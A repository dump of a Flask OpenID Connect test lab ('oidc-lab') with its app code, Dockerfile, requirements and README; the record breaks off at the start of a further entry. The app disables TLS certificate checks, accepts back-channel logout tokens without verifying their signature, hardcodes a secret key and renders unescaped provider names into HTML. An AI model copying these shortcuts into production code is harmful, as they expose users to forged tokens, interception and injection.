b3a6b1c765b3b9cea70bf789dfc88809a49ba8df
|
a5adc3d626064ef509da6faf49222df5a181245f
|
e825a3b03989a0655cb97d1362ca37cd20f8bfec
|
refs/heads/master
| 2022-09-15T04:45:52.065573 | 2022-08-29T14:26:26 | 2022-08-29T14:26:26 | 154,526,557 | 3 | 2 | null | 2018-10-24T15:39:35 | 2019-11-12T07:57:05 | 2019-11-26T12:24:37 |
Python
|
[
{
"alpha_fraction": 0.5854426026344299,
"alphanum_fraction": 0.5899985432624817,
"avg_line_length": 32.85067367553711,
"blob_id": "b12b5882eb8ed2e72bc9a12e6b454773854c975f",
"content_id": "6eed98dd36896b2967175f4c8d3781b01430638a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 27656,
"license_type": "no_license",
"max_line_length": 220,
"num_lines": 817,
"path": "/oidc-lab.py",
"repo_name": "HarryKodden/oidc-lab",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\n\"\"\"oidc-lab.py: Core functionality of the application.\n\"\"\"\n\n__author__ = \"Harry Kodden\"\n__copyright__ = \"Copyright 2018, SURFnet\"\n__version__ = \"1.0\"\n__maintainer__ = \"Harry Kodden\"\n__email__ = \"[email protected]\"\n__status__ = \"Development\"\n\nimport os\nimport json\nimport logging\nimport urllib\nimport requests\nimport jwt\nimport ssl\nimport base64\n\nfrom flask import Flask, g, redirect, current_app, request, render_template, Response, session\nfrom flask.helpers import make_response\nfrom flask_oidc import OpenIDConnect, DummySecretsCache\nfrom flask_restful import abort, Api, Resource\nfrom oauth2client.client import flow_from_clientsecrets, OAuth2WebServerFlow, AccessTokenRefreshError, OAuth2Credentials\nfrom base64 import urlsafe_b64encode\nimport httplib2\nfrom six.moves.urllib.parse import urlencode\n\nimport gevent\nfrom gevent.pywsgi import WSGIServer\nfrom gevent.queue import Queue\n\nLOG_LEVEL = os.environ.get('LOG_LEVEL', 'DEBUG').upper()\n\nlogging.basicConfig(\n level=LOG_LEVEL,\n format='%(asctime)s [%(levelname)s] %(message)s'\n)\n\nlogger = logging.getLogger(__name__)\n\nPORT = 8000\nHOST = os.environ.get(\"HOST\", \"localhost:%d\"% (PORT))\n\nif HOST.startswith(\"localhost\"):\n SCHEME = \"http\"\nelse:\n SCHEME = \"https\"\n\nREQUESTED_SCOPES = ['openid', 'email', 'profile']\n\nCALLBACK = \"/oidc_callback\"\nBACKCHANNEL_LOGOUT = \"/logout\"\n\nREDIRECT_URL = \"{}://{}{}\".format(SCHEME, HOST, CALLBACK)\n\napp = Flask(__name__)\n\napp.config.update({\n 'server' : 'https://eduid.lab.surf.nl/auth/',\n 'realm' : 'eduID',\n 'client_id': 'portal',\n 'SECRET_KEY': 'SomethingNotEntirelySecret',\n 'TESTING': True,\n 'DEBUG': True,\n \"PREFERRED_URL_SCHEME\": SCHEME,\n 'OIDC_CLIENT_SECRETS': None,\n 'OIDC_ID_TOKEN_COOKIE_SECURE': False,\n 'OIDC_REQUIRE_VERIFIED_EMAIL': False,\n 'OIDC_OPENID_REALM': None,\n 'OIDC_USER_INFO_ENABLED': True,\n 'OIDC_SCOPES': REQUESTED_SCOPES,\n 'OIDC_INTROSPECTION_AUTH_METHOD': 'client_secret_post'\n})\n\nALLOWED_REGISTRATTION_ATTRIBUTES = ['client_id', 'client_secret']\n\nclass _Registration(dict):\n def __init__(self, data):\n logger.debug('New Registration: {}'.format(data))\n\n assert 'client_id' in data, \"'client_id' is missing in registration\"\n assert 'client_secret' in data, \"'client_secret' is missing in registration\"\n\n for i in data.keys():\n self[i] = data[i]\n\n def __getitem__(self, key):\n if key == 'client_secret':\n return '*******'\n elif key == '*client_secret*':\n return super().__getitem__('client_secret')\n else:\n return super().__getitem__(key)\n\n def get(self,key,default=None):\n try:\n return self[key]\n except:\n return default\n\n def __setitem__(self, key, value):\n logger.debug('- [REGISTRATION] {} := {}'.format(key, value))\n\n assert key in ALLOWED_REGISTRATTION_ATTRIBUTES, \\\n \"attribute {} not valid, only {} allowed\". format(key, ALLOWED_REGISTRATTION_ATTRIBUTES)\n\n super().__setitem__(key, value)\n\nALLOWED_PROVIDER_ATTRIBUTES = ['base_url', 'description', 'client_name', 'registration', 'scopes']\n\nclass _Provider(dict):\n\n def __init__(self, data):\n logger.debug('New Provider: {}'.format(data))\n\n assert 'base_url' in data, \"'base_url' missing\"\n\n for i in data.keys():\n self[i] = data[i]\n\n def get(self,key,default=None):\n try:\n return self[key]\n except:\n return default\n\n def __getitem__(self, key):\n return super().__getitem__(key)\n\n def __setitem__(self, key, value):\n logger.debug('- [PROVIDER] {} := {}'.format(key, value))\n\n assert key in ALLOWED_PROVIDER_ATTRIBUTES, \\\n \"attribute {} not valid, only {} allowed\". format(key, ALLOWED_PROVIDER_ATTRIBUTES)\n\n if key == 'registration':\n super().__setitem__(key, _Registration(value))\n else:\n super().__setitem__(key, value)\n\nPROVIDERS = {}\n\ndef abort_if_provider_doesnt_exist(name):\n if name not in PROVIDERS:\n abort(404, message=\"Provider {} doesn't exist\".format(name))\n\ndef get_dict(value):\n\n if isinstance(value, dict):\n result = {}\n\n for i in value.keys():\n result[i] = get_dict(value[i])\n\n return result\n elif isinstance(value, list):\n result = []\n\n for i in value:\n result.append(i)\n\n return result\n else:\n return value\n\nclass Provider(Resource):\n def get(self, name):\n abort_if_provider_doesnt_exist(name)\n return get_dict(PROVIDERS[name])\n\n def delete(self, name):\n abort_if_provider_doesnt_exist(name)\n del PROVIDERS[name]\n return '', 204\n\n def put(self, name):\n logger.debug(\"PUT Provider: {}...\".format(name))\n\n try:\n data = request.get_json()\n\n assert data != None, \"missing provider definition\"\n\n PROVIDERS[name] = _Provider(data)\n\n except Exception as e:\n\n logger.debug(\"Error: {}\".format(str(e)))\n abort(404, message=\"{}\".format(str(e)))\n\n return self.get(name), 201\n\nclass Providers(Resource):\n def get(self):\n return get_dict(PROVIDERS)\n\napi = Api(app)\napi.add_resource(Provider, '/api/provider/<name>')\napi.add_resource(Providers, '/api/providers')\n\nfrom itsdangerous import JSONWebSignatureSerializer, TimedJSONWebSignatureSerializer\n\nclass MyOpenIDConnect(OpenIDConnect):\n\n def __init__(self, app=None, credentials_store=None, http=None, time=None,\n urandom=None, provider=None):\n\n super().__init__(credentials_store, http, time, urandom)\n\n self.client_secrets = None\n\n if app:\n self.init_app(app)\n\n if provider:\n self.init_provider(provider)\n\n def init_app(self, app):\n \"\"\"\n Do setup that requires a Flask app.\n\n :param app: The application to initialize.\n :type app: Flask\n \"\"\"\n # Set some default configuration options\n app.config.setdefault('OIDC_SCOPES', REQUESTED_SCOPES)\n app.config.setdefault('OIDC_GOOGLE_APPS_DOMAIN', None)\n app.config.setdefault('OIDC_ID_TOKEN_COOKIE_NAME', 'oidc_id_token')\n app.config.setdefault('OIDC_ID_TOKEN_COOKIE_PATH', '/')\n app.config.setdefault('OIDC_ID_TOKEN_COOKIE_TTL', 7 * 86400) # 7 days\n # should ONLY be turned off for local debugging\n app.config.setdefault('OIDC_COOKIE_SECURE', True)\n app.config.setdefault('OIDC_VALID_ISSUERS',None)\n app.config.setdefault('OIDC_CLOCK_SKEW', 6000) # 1 minute\n app.config.setdefault('OIDC_REQUIRE_VERIFIED_EMAIL', False)\n app.config.setdefault('OIDC_OPENID_REALM', None)\n app.config.setdefault('OIDC_USER_INFO_ENABLED', True)\n app.config.setdefault('OIDC_CALLBACK_ROUTE', CALLBACK)\n app.config.setdefault('OVERWRITE_REDIRECT_URI', REDIRECT_URL)\n app.config.setdefault(\"OIDC_EXTRA_REQUEST_AUTH_PARAMS\", {})\n # Configuration for resource servers\n app.config.setdefault('OIDC_RESOURCE_SERVER_ONLY', False)\n app.config.setdefault('OIDC_RESOURCE_CHECK_AUD', False)\n\n # We use client_secret_post, because that's what the Google\n # oauth2client library defaults to\n app.config.setdefault('OIDC_INTROSPECTION_AUTH_METHOD', 'client_secret_post')\n app.config.setdefault('OIDC_TOKEN_TYPE_HINT', 'access_token')\n\n if not 'openid' in app.config['OIDC_SCOPES']:\n raise ValueError('The value \"openid\" must be in the OIDC_SCOPES')\n\n # register callback route and cookie-setting decorator\n if not app.config['OIDC_RESOURCE_SERVER_ONLY']:\n app.route(app.config['OIDC_CALLBACK_ROUTE'])(self._oidc_callback)\n app.before_request(self._before_request)\n app.after_request(self._after_request)\n\n # create signers using the Flask secret key\n self.extra_data_serializer = JSONWebSignatureSerializer(\n app.config['SECRET_KEY'])\n self.cookie_serializer = TimedJSONWebSignatureSerializer(\n app.config['SECRET_KEY'])\n\n try:\n self.credentials_store = app.config['OIDC_CREDENTIALS_STORE']\n except KeyError:\n pass\n\n def refresh(self):\n\n id_token = self._get_cookie_id_token()\n\n try:\n credentials = OAuth2Credentials.from_json(\n self.credentials_store[id_token['sub']])\n except KeyError:\n logger.debug(\"Expired ID token, credentials missing\",\n exc_info=True)\n\n # refresh and store credentials\n try:\n credentials.refresh(httplib2.Http())\n if credentials.id_token:\n id_token = credentials.id_token\n self.credentials_store[id_token['sub']] = credentials.to_json()\n self._set_cookie_id_token(id_token)\n except AccessTokenRefreshError:\n logger.debug(\"Failed to refresh !\")\n\n def _before_request(self):\n g.oidc_id_token = None\n\n if self.client_secrets:\n self.authenticate_or_redirect()\n\n def redirect_to_auth_server(self, destination=None, customstate=None):\n \"\"\"\n Set a CSRF token in the session, and redirect to the IdP.\n\n :param destination: The page that the user was going to,\n before we noticed they weren't logged in.\n :type destination: Url to return the client to if a custom handler is\n not used. Not available with custom callback.\n :param customstate: The custom data passed via the ODIC state.\n Note that this only works with a custom_callback, and this will\n ignore destination.\n :type customstate: Anything that can be serialized\n :returns: A redirect response to start the login process.\n :rtype: Flask Response\n\n .. deprecated:: 1.0\n Use :func:`require_login` instead.\n \"\"\"\n if not self._custom_callback and customstate:\n raise ValueError('Custom State is only avilable with a custom '\n 'handler')\n if 'oidc_csrf_token' not in session:\n csrf_token = urlsafe_b64encode(os.urandom(24)).decode('utf-8')\n session['oidc_csrf_token'] = csrf_token\n state = {\n 'csrf_token': session['oidc_csrf_token'],\n }\n statefield = 'destination'\n statevalue = destination\n if customstate is not None:\n statefield = 'custom'\n statevalue = customstate\n state[statefield] = self.extra_data_serializer.dumps(\n statevalue).decode('utf-8')\n\n extra_params = {\n 'state': urlsafe_b64encode(json.dumps(state).encode('utf-8')),\n }\n extra_params.update(current_app.config['OIDC_EXTRA_REQUEST_AUTH_PARAMS'])\n if current_app.config['OIDC_GOOGLE_APPS_DOMAIN']:\n extra_params['hd'] = current_app.config['OIDC_GOOGLE_APPS_DOMAIN']\n if current_app.config['OIDC_OPENID_REALM']:\n extra_params['openid.realm'] = current_app.config[\n 'OIDC_OPENID_REALM']\n\n flow = self._flow_for_request()\n auth_url = '{url}&{extra_params}'.format(\n url=flow.step1_get_authorize_url(),\n extra_params=urlencode(extra_params))\n # if the user has an ID token, it's invalid, or we wouldn't be here\n self._set_cookie_id_token(None)\n return redirect(auth_url)\n\n def init_provider(self, provider):\n \"\"\"\n Do setup for a specific provider\n\n :param provider: The provider to initialize.\n :type provider: Dictionary with at lease 'base_url' item\n \"\"\"\n\n secrets = self.load_secrets(provider)\n assert secrets != None, \"Problem with loading secrets\"\n\n self.client_secrets = list(secrets.values())[0]\n secrets_cache = DummySecretsCache(secrets)\n\n # Initialize oauth2client\n self.flow = flow_from_clientsecrets(\n current_app.config['OIDC_CLIENT_SECRETS'],\n scope=current_app.config['OIDC_SCOPES'],\n cache=secrets_cache)\n\n assert isinstance(self.flow, OAuth2WebServerFlow)\n\n if current_app.config['OIDC_INTROSPECTION_AUTH_METHOD'] == 'client_secret_basic':\n basic_auth_string = '%s:%s' % (self.client_secrets['client_id'], self.client_secrets['client_secret'])\n basic_auth_bytes = bytearray(basic_auth_string, 'utf-8')\n self.flow.authorization_header = 'Basic %s' % base64.b64encode(basic_auth_bytes).decode('utf-8')\n\n current_app.config['OIDC_VALID_ISSUERS'] = self.client_secrets.get('issuer')\n\n def logout(self):\n logger.debug(\"logging out...\")\n\n super().logout()\n\n def __exit__(self, exception_type, exception_value, traceback):\n self.logout()\n\n current_app.config['OIDC_VALID_ISSUERS'] = None\n\n if self.client_secrets:\n logger.debug(\"Closing connection with current provider...\")\n self.client_secrets = None\n\n def _is_id_token_valid(self, id_token):\n if 'aud' in id_token and isinstance(id_token['aud'], list) and len(id_token['aud']) == 1:\n id_token['aud'] = id_token['aud'][0]\n\n return super()._is_id_token_valid(id_token)\n\n def token(self):\n \n try:\n return self.credentials_store[g.oidc_id_token['sub']]\n except KeyError:\n logger.debug(\"No Token !\", exc_info=True)\n return None\n\n def details(self):\n return self._retrieve_userinfo()\n\n def load_secrets(self, provider):\n if not provider:\n return None\n\n try:\n url = provider.get('base_url')\n\n if not url.endswith('/'):\n url += '/'\n\n url += \".well-known/openid-configuration\"\n\n logger.debug(\"Loading: {}\".format(url))\n context = ssl._create_unverified_context()\n response = urllib.request.urlopen(url, context=context)\n \n provider_info = json.load(response)\n\n except Exception as e:\n raise Exception(\"Can not obtain well known information: {}\".format(str(e)))\n\n for path in ['issuer', 'registration_endpoint', 'authorization_endpoint', 'token_endpoint', 'userinfo_endpoint']:\n if path in provider_info and provider_info[path].startswith('/'):\n provider_info[path] = \"{}{}\".format(provider.get('base_url'), provider_info[path])\n\n for method in provider_info.get('token_endpoint_auth_methods_supported',[]):\n current_app.config['OIDC_INTROSPECTION_AUTH_METHOD'] = method\n break # Just take first...\n\n registration = provider.get('registration', None)\n\n if not registration:\n try:\n logger.debug(\"Dynamic Registration...\")\n\n registration = requests.post(\n provider_info['registration_endpoint'],\n data = json.dumps({\n \"redirect_uris\": REDIRECT_URL,\n \"grant_types\": \"authorization_code\",\n \"client_name\": provider.get('client_name', \"Dynamic Registration\"),\n \"response_types\": \"code\",\n \"token_endpoint_auth_method\": \"client_secret_post\",\n \"application_type\": \"native\"\n }),\n headers = {\n 'Content-Type': \"application/json\",\n 'Cache-Control': \"no-cache\"\n }\n ).json()\n\n logger.debug(\"Registration: {}\".format(registration))\n\n except Exception as e:\n raise Exception(\"Can not make client registration: {}\".format(str(e)))\n\n try:\n try:\n jwks_keys = json.load(\n urllib.request.urlopen(provider_info['jwks_uri'])\n )\n except:\n jwks_keys = None\n\n current_app.config['OIDC_SCOPES'] = provider.get('scopes', provider_info.get('scopes_supported', REQUESTED_SCOPES))\n \n if 'offline_access' in current_app.config['OIDC_SCOPES']:\n current_app.config['OIDC_EXTRA_REQUEST_AUTH_PARAMS'].update({'prompt' : 'consent'})\n\n return {\n 'web' : {\n 'client_id': registration.get('client_id'),\n 'client_secret': registration.get('*client_secret*', registration.get('client_secret', None)),\n 'auth_uri': provider_info['authorization_endpoint'],\n 'token_uri': provider_info['token_endpoint'],\n 'userinfo_uri': provider_info['userinfo_endpoint'],\n 'jwks_keys': jwks_keys,\n 'redirect_uris': REDIRECT_URL,\n 'issuer': provider_info['issuer'],\n }\n }\n except Exception as e:\n raise Exception(\"Error in preparing result: {}\".format(str(e)))\n\n raise Exception(\"No secrets loaded !\")\n\noidc = MyOpenIDConnect(app)\n\[email protected]('/login/<provider>')\ndef login(provider):\n\n logger.error(\"Logging in to provider: {}\".format(provider))\n\n try:\n oidc.logout()\n oidc.init_provider(PROVIDERS[provider])\n return redirect('/private', code=302)\n except Exception as e:\n return 'Error activating provider: {}, error: {}<br/><br/><a href=\"/\">Return</a>'.format(provider, str(e))\n\[email protected]('/')\ndef hello_world():\n\n options = ''\n for i in PROVIDERS.keys():\n options += '<option value=\"{}\">{}</option>'.format(i,i)\n\n html = \"\"\"\n <h1>Welcome to my OIDC switch board</h1>\n <h2>Choose a provider...</h2>\n <select name=\"formal\" onchange=\"javascript:handleSelect(this)\">\n <option value=\"\">### select a provider ###></option>\n {}\n </select>\n\"\"\".format(options)\n\n script = \"\"\"\n <script type=\"text/javascript\">\n function handleSelect(provider) {\n if (provider > \"\") {\n window.location = \"/login/\"+provider.value;\n }\n }\n </script>\n\"\"\"\n\n help = \"\"\"\n<hr><h1>Howto</h1>\n<br/>You can manage provider details via RESTful API interface.\n<br/><br/>\n<b>Example 1. List current Providers</b><br/>\n<a href=\"/api/providers\">List Providers</a>\n<br/><br/>\n<b>Example 2. Add a provider that allows dynamic regfistration</b><br/>\n<br/>\n<pre>\ncurl -X PUT \\\\\n %s://%s/api/provider/test \\\\\n -H 'Content-Type: application/json' \\\\\n -d '{ \"base_url\": \"https://eduid.lab.surf.nl/\", \"description\": \"My Provider\", \"client_name\": \"testing123\" }'\n</pre>\n<br/>\nAbove provider will use 'dynamic client registration', off course this will only work if your provider allows you to do so.\n<br/><br/>\n<b>Example 3. Add a provider with client credentials</b><br/>\n<br/>\nIf you have client_id and client_secret from your provider, then specify as follows:\n<pre>\ncurl -X PUT \\\\\n %s://%s/api/provider/test \\\\\n -H 'Content-Type: application/json' \\\\\n -d '{ \"base_url\": \"https://eduid.lab.surf.nl/\", \"registration\": { \"client_id\": \"<b>YOUR CLIENT_ID</b>\", \"client_secret\": \"<b>YOUR CLIENT_SECRET</b>\" } }'\n</pre>\n<br/>\n<b>NOTE:</b> Please make sure your have registered <b>%s</b> as a valid callback uri with your provider !\n<br/>\n<hr/>\n(c)2018 Harry Kodden, <a href=\"https://github.com/HarryKodden/oidc-lab\">Source on Github</a>\n\"\"\" % (SCHEME, HOST, SCHEME, HOST, REDIRECT_URL)\n\n if oidc.user_loggedin:\n return (\n 'You are logged in with userid: %s<br/><br/>'\n '<a href=\"/private\">See private</a><br/>'\n '<a href=\"/logout\">Log out</a>'\n ) % oidc.user_getfield('sub')\n else:\n return '{}{}{}'.format(html,script,help)\n\n\[email protected]('/uma')\[email protected]_login\ndef uma():\n return render_template('uma.html', error=\"\", client=oidc.client_secrets, token=json.loads(oidc.token()))\n\nsubscriptions = {}\n\nclass ServerSentEvent(object):\n\n def __init__(self, data):\n self.data = data\n self.event = None\n self.id = None\n self.desc_map = {\n self.data : \"data\",\n self.event : \"event\",\n self.id : \"id\"\n }\n\n def encode(self):\n if not self.data:\n return \"\"\n\n lines = [\"%s: %s\" % (v, k) \n for k, v in self.desc_map.items() if k]\n \n return \"%s\\n\\n\" % \"\\n\".join(lines)\n\[email protected]('/subscribe/<sub>')\ndef subscribe(sub):\n logger.debug(\"Subscribing: {}\".format(sub))\n\n if sub not in subscriptions:\n subscriptions[sub] = []\n\n def gen():\n logger.debug(\"Making Generator...\")\n\n q = Queue()\n subscriptions[sub].append(q)\n try:\n while True:\n result = q.get(block=True)\n logger.debug(\"Queue Get: {}\".format(result))\n\n ev = ServerSentEvent(str(result))\n \n logger.debug(\"Yielding: {}\".format(ev.encode()))\n\n yield ev.encode()\n except GeneratorExit:\n logger.debug(\"Removing Generator...\")\n subscriptions[sub].remove(q)\n\n return Response(gen(), mimetype=\"text/event-stream\")\n\ndef publish(sub, msg):\n def notify():\n try:\n for sid in subscriptions[sub][:]:\n logger.debug(\"Publishing sub: {} msg: {}, sid: {}\".format(sub, msg, sid))\n sid.put(msg)\n except Exception as e:\n logger.debug(\"Exception during notify: {}\".format(str(e)))\n\n logger.debug(\"Publishing to sub: {} msg: {}\".format(sub, msg))\n if sub in subscriptions:\n gevent.spawn(notify)\n\[email protected]('/refresh')\[email protected]_login\ndef refresh():\n try:\n oidc.refresh()\n except Exception as e:\n logger.debug(\"Error during refresh: {}\".format(str(e)))\n \n return hello_me()\n\[email protected]('/private')\[email protected]_login\ndef hello_me():\n\n try:\n sub = oidc.details()[\"sub\"]\n\n script = \"\"\"\n <script>\n var eventSource = new EventSource(\"/subscribe/%s\");\n\n eventSource.onmessage = function(e) {\n console.log(e.data);\n window.location.href = \"/logout\";\n };\n </script>\n\"\"\" % sub\n\n except Exception as e:\n logger.debug(\"Error during script prepare: {}\".format(str(e)))\n script = \"\"\n\n refresh = ''\n \n try:\n token = '<h1>Token Details:</h1><br/><table border=\"1\">'\n token += '<tr><th>Attribute</th><th>Value</th></tr>'\n\n t = json.loads(oidc.token())['token_response']\n logger.debug(\"TOKEN: {}\".format(t))\n\n for k,v in t.items():\n token += '<tr><td>{}</td><td><pre>{}</pre></td></tr>'.format(k, v)\n\n if k == 'refresh_token':\n refresh = '<br/><a href=\"/refresh\">Refresh !</a><br/>'\n\n try:\n v = jwt.decode(v, options={\"verify_signature\": False})\n v = json.dumps(v, indent=4, sort_keys=True)\n token += '<tr><td>{} (decoded)</td><td><pre>{}</pre></td></tr>'.format(k, v)\n except:\n pass\n\n token += '</table>'\n except Exception as e:\n token = 'No token details available...{}'.format(str(e))\n\n try:\n info = oidc.details()\n\n data = '<h1>User Info:</h1><br/><table border=\"1\">'\n data += '<tr><th>Attribute</th><th>Value</th></tr>'\n if info:\n for f in info.keys():\n data += '<tr><td>{}</td><td>{}</td></tr>'.format(f, info[f])\n data += '</table>'\n except:\n data = 'No userdata available...'\n\n return ('{}<br/>{}<br/>{}<br/>{}<a href=\"/\">Return</a>'.format(script, token, data, refresh))\n\[email protected]('/test_logout/<sub>', methods=['GET'])\ndef test_logout(sub):\n publish(sub, \"Logout\")\n return \"OK\"\n\[email protected]('/logout', methods=['GET', 'POST'])\ndef logout():\n global oidc\n\n if request.method == 'POST':\n # Evaluate BackChannel logout\n # Refer: https://openid.net/specs/openid-connect-backchannel-1_0.html\n # chapter 2.5 Back-Channel Logout Request\n\n logger.debug(\"Backchannel logout request\")\n # need to evaluate the request...\n \"\"\" \n If the Logout Token is encrypted, decrypt it using the keys and algorithms that the Client specified during Registration that the OP was to use to encrypt ID Tokens.\n If ID Token encryption was negotiated with the OP at Registration time and the Logout Token is not encrypted, the RP SHOULD reject it.\n Validate the Logout Token signature in the same way that an ID Token signature is validated, with the following refinements.\n Validate the iss, aud, and iat Claims in the same way they are validated in ID Tokens.\n Verify that the Logout Token contains a sub Claim, a sid Claim, or both.\n Verify that the Logout Token contains an events Claim whose value is JSON object containing the member name http://schemas.openid.net/event/backchannel-logout.\n Verify that the Logout Token does not contain a nonce Claim.\n Optionally verify that another Logout Token with the same jti value has not been recently received.\n\"\"\"\n\n logger.debug(\"Data received: {}\".format(request.get_data().decode('utf-8')))\n\n payload = {}\n\n try:\n logout_token = request.form.get('logout_token', None)\n\n if not logout_token:\n raise Exception(\"No logout_token\")\n \n payload = jwt.decode(logout_token, verify=False)\n\n logger.debug(\"Logout Token payload: {}\".format(json.dumps(payload, indent=4, sort_keys=True)))\n \n if \"sub\" not in payload and \"sid\" not in payload:\n raise Exception(\"Missing sub and/or sid claims\")\n\n if \"events\" not in payload:\n raise Exception(\"Missing events claim\")\n\n if \"http://schemas.openid.net/event/backchannel-logout\" not in payload[\"events\"]:\n raise Exception(\"Events claim missing required member\")\n\n if \"nonce\" in payload:\n raise Exception(\"Logout token should not contain nonce claim\")\n\n except Exception as e:\n logger.debug(\"Logout Error: {}\".format(str(e)))\n\n r = make_response(str(e), 400)\n r.headers['Cache-Control'] = 'no-cache, no-store'\n r.headers['Pragma'] = 'no-cache'\n return r\n\n # Make response\n \"\"\"\n If the logout succeeded, the RP MUST respond with HTTP 200 OK. \n If the logout request was invalid, the RP MUST respond with HTTP 400 Bad Request. \n If the logout failed, the RP MUST respond with 501 Not Implemented. \n If the local logout succeeded but some downstream logouts have failed, the RP MUST respond with HTTP 504 Gateway Timeout.\n\nThe RP's response SHOULD include Cache-Control directives keeping the response from being cached to prevent cached responses from interfering with future logout requests. It is RECOMMENDED that these directives be used: \n\n- Cache-Control: no-cache, no-store\n- Pragma: no-cache\n\"\"\"\n if payload and \"sub\" in payload:\n publish(payload[\"sub\"], \"Logout\")\n\n r = make_response('', 200)\n r.headers['Cache-Control'] = 'no-cache, no-store'\n r.headers['Pragma'] = 'no-cache'\n return r\n \n oidc.logout()\n \n return 'Hi, you have been logged out!<br/><br/><a href=\"/\">Return</a>'\n\nif __name__ == \"__main__\":\n\n if app.debug:\n import os\n # Allow insecure oauth2 when debugging\n os.environ[\"OAUTHLIB_INSECURE_TRANSPORT\"] = \"1\"\n\n server = WSGIServer((\"\", 8000), app)\n server.serve_forever()\n"
},
{
"alpha_fraction": 0.7379310131072998,
"alphanum_fraction": 0.800000011920929,
"avg_line_length": 11.083333015441895,
"blob_id": "471e7fc846c9e3f753a9ee46d36034923ff51964",
"content_id": "468c184da7bb558c16dfbed86b6448108958eac0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 145,
"license_type": "no_license",
"max_line_length": 19,
"num_lines": 12,
"path": "/requirements.txt",
"repo_name": "HarryKodden/oidc-lab",
"src_encoding": "UTF-8",
"text": "Flask\nrequests\nrequests-oauthlib\ngunicorn\ngevent\nfuture\nflask-cache\nflask-login\nflask-oidc>=1.4.0\nflask-restful\npyjwt>=2.1.0\nitsdangerous==2.0.1\n"
},
{
"alpha_fraction": 0.7281553149223328,
"alphanum_fraction": 0.7475728392601013,
"avg_line_length": 17.176469802856445,
"blob_id": "b4e66c8483c6b1157bd88d93f92f3820235a124b",
"content_id": "9f513be2aca547e91b25f953414f9a0209d04b19",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 309,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 17,
"path": "/Dockerfile",
"repo_name": "HarryKodden/oidc-lab",
"src_encoding": "UTF-8",
"text": "FROM python:3.7-stretch\n\nMAINTAINER [email protected]\n\nRUN apt-get update\n\nCOPY requirements.txt .\nRUN pip install -r requirements.txt\n\nADD oidc-lab.py /usr/local/bin/\n\nRUN echo \"Europe/Amsterdam \" > /etc/timezone\nRUN dpkg-reconfigure -f noninteractive tzdata\n\nEXPOSE 8000\n\nCMD [\"python\", \"/usr/local/bin/oidc-lab.py\"]\n"
},
{
"alpha_fraction": 0.7220259308815002,
"alphanum_fraction": 0.7385159134864807,
"avg_line_length": 30.837499618530273,
"blob_id": "269ab40c27845ed5dff16351af14182886e8e4aa",
"content_id": "090699522cae1660cc3fc59d8cc91a4702e5454c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2547,
"license_type": "no_license",
"max_line_length": 202,
"num_lines": 80,
"path": "/README.md",
"repo_name": "HarryKodden/oidc-lab",
"src_encoding": "UTF-8",
"text": "# Welcome\n\n\n\n# Example\n\n\n\n# Howto\n\n\nThis application is based on Flask-OIDC. In standard Flask-OIDC application the connection between OIDC-Client (RP) and OIDC-Server (OP) is hard-wired via compile time **client-secrets** configuration. \n\nIn this application, the connection between RP and OP is not hard-wired. It is fully adjustable dynamically at RunTime. The configuration can be adjusted via a REST Api calls, see some examples below.\n\nThis dynamic behavior is achieved by subclassing the Flask-OIDC Class *OpenIDConnect*. The method *init_provider* is only called when a user has selected the provider to authenticate against.\nFurthermore, the subclass is completely dynamic on retrieving provider configuration via the standard **.../.well-known/openid-configuration** endpoints.\n\nHope you enjoy.\n\nFeedback is appreciated.\n\n## Build\n\nIf you have docker installed, you can just run:\n\n```\ndocker build -t oidclab .\n```\n\n## Run application\n\nWith docker you enter:\n\n```\ndocker run -p 8000:8000 -d oidclab\n```\n\nNow open your browser on [http://localhost:8000](http://localhost:8000)\n\n## Configuration\n\nYou can manage provider details via RESTful API interface.\n\nIn the examples below, it is assumed you are running the application on your local machine, therefor http://localhost:8000 is taken as the address of the OIDC Relying Party host address.\n\nCommands below are to be initiated from a terminal session, you should have command **curl** available.\n\n### Example 1. List current Providers\n\n```\ncurl http://localhost:8000/api/providers\n```\n\n### Example 2. Add a provider that allows dynamic registration\n\n```\n\ncurl -X PUT \\\n http://localhost:8000/api/provider/test \\\n -H 'Content-Type: application/json' \\\n -d '{ \"base_url\": \"https://<some provider>/\", \"description\": \"My Provider\", \"client_name\": \"testing123\" }'\n```\n\n\nAbove provider will use 'dynamic client registration', off course this will only work if your provider allows you to do so.\n\n### Example 3. Add a provider with client credentials\n\nIf you have client_id and client_secret from your provider, then specify as follows:\n\n```\ncurl -X PUT \\\n http://localhost:8000/api/provider/test \\\n -H 'Content-Type: application/json' \\\n -d '{ \"base_url\": \"https://<some provider>/\", \"registration\": { \"client_id\": \"YOUR CLIENT_ID\", \"client_secret\": \"YOUR CLIENT_SECRET\" } }'\n```\n\n\n**NOTE:** Please make sure your have registered **http://localhost:8000/oidc_callback** as a valid callback uri with your provider !\n"
}
] | 4 |
JayBk/100-days-of-code
|
https://github.com/JayBk/100-days-of-code
|
94ee3d4ad663b4d39c2d2e744b06a4d2de25d024
|
b0891028e568e5f873b480e1b900bf0892ebceaa
|
5d84b23bf7fe9ff21b1d55eb9c4ec89fdc3b34d6
|
refs/heads/master
| 2021-01-11T10:04:11.735132 | 2017-01-11T04:59:26 | 2017-01-11T04:59:26 | 77,884,303 | 0 | 0 | null | 2017-01-03T04:35:34 | 2017-01-03T04:03:24 | 2017-01-03T03:44:41 | null |
[
{
"alpha_fraction": 0.6019108295440674,
"alphanum_fraction": 0.6146496534347534,
"avg_line_length": 49.2400016784668,
"blob_id": "ef68426da1fe14a48eaaace91dcd758dbb70da61",
"content_id": "a7dde435589d4ebb099cf1f63a41cd68ea92ed13",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2512,
"license_type": "no_license",
"max_line_length": 155,
"num_lines": 50,
"path": "/Projects/Gui4Scrapes/stockscr.py",
"repo_name": "JayBk/100-days-of-code",
"src_encoding": "UTF-8",
